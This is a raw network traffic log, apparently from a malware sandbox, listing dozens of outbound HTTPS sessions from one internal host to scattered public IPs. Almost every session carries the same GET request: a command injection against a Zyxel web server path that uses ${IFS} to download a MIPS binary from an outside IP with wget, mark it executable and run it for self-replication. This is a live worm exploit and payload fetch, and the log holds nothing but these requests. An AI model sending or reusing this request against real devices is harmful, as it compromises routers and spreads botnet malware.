                                                      Feb 2, 2024 06:35:59.775259018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6097192.168.2.144993495.213.220.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775290966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6098192.168.2.145045263.133.195.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775341988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6099192.168.2.1453924189.66.16.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775378942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6100192.168.2.1437510171.128.20.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775409937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6101192.168.2.143655038.42.9.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775456905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6102192.168.2.14479608.72.148.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775491953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6103192.168.2.143493066.74.241.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775540113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6104192.168.2.1450082199.3.20.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775573969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6105192.168.2.146076883.208.177.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775599957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6106192.168.2.1446174220.68.18.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775650024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6107192.168.2.1449794121.201.20.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775698900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6108192.168.2.1459312121.228.14.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775736094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6109192.168.2.1452862128.239.62.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775764942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6110192.168.2.1449190105.108.17.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775820017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6111192.168.2.1439464198.234.236.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775866032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6112192.168.2.145914895.87.58.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775897026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6113192.168.2.1457866115.134.101.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775932074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6114192.168.2.1455468170.98.111.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775984049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6115192.168.2.1453758147.87.8.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776021004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6116192.168.2.1449326130.242.122.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776058912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6117192.168.2.1434332144.95.124.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776097059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6118192.168.2.1441944154.19.30.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776139975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6119192.168.2.1449266149.118.243.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776174068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6120192.168.2.144158837.120.163.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776215076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6121192.168.2.1449632133.110.75.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776258945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6122192.168.2.143359859.197.249.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776293993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6123192.168.2.1437924187.236.7.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776336908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6124192.168.2.1451886174.119.156.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776382923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6125192.168.2.1460246122.241.211.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776422977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6126192.168.2.1451290206.34.130.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776453972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6127192.168.2.1444004122.112.38.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776485920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6128192.168.2.145893418.86.102.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776549101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6129192.168.2.144289877.45.231.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776566982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6130192.168.2.144890485.158.145.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776623964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6131192.168.2.145817623.22.136.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776654005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6132192.168.2.144355037.229.235.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776699066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6133192.168.2.145315669.87.83.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776748896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6134192.168.2.144861654.3.83.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776794910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6135192.168.2.1442424200.123.204.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776850939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6136192.168.2.144122659.68.220.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776884079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6137192.168.2.144504266.199.193.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776926041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6138192.168.2.143997652.132.99.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.776962042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6139192.168.2.1434604133.80.190.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777008057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6140192.168.2.143286013.237.253.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777033091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6141192.168.2.144270692.102.170.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777069092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6142192.168.2.143440293.131.149.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777136087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6143192.168.2.1437966184.57.110.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777173042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6144192.168.2.144502820.190.84.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777220964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6145192.168.2.1447948163.0.6.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777257919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6146192.168.2.143371223.172.56.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777293921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6147192.168.2.143595091.55.76.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777318954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6148192.168.2.144047291.68.79.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777371883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6149192.168.2.1435628137.207.67.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777432919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6150192.168.2.1437498178.52.34.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777452946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6151192.168.2.1442566196.25.111.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777506113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6152192.168.2.1452010204.49.2.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777544022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6153192.168.2.144316262.208.153.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777576923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6154192.168.2.145361417.92.221.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777616978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6155192.168.2.1458452172.99.253.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777645111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6156192.168.2.1435896195.188.221.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777697086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6157192.168.2.145130891.225.184.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777725935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6158192.168.2.1434768208.197.15.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.777774096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6159192.168.2.144128432.180.36.209443
                                                      TimestampBytes transferredDirectionData
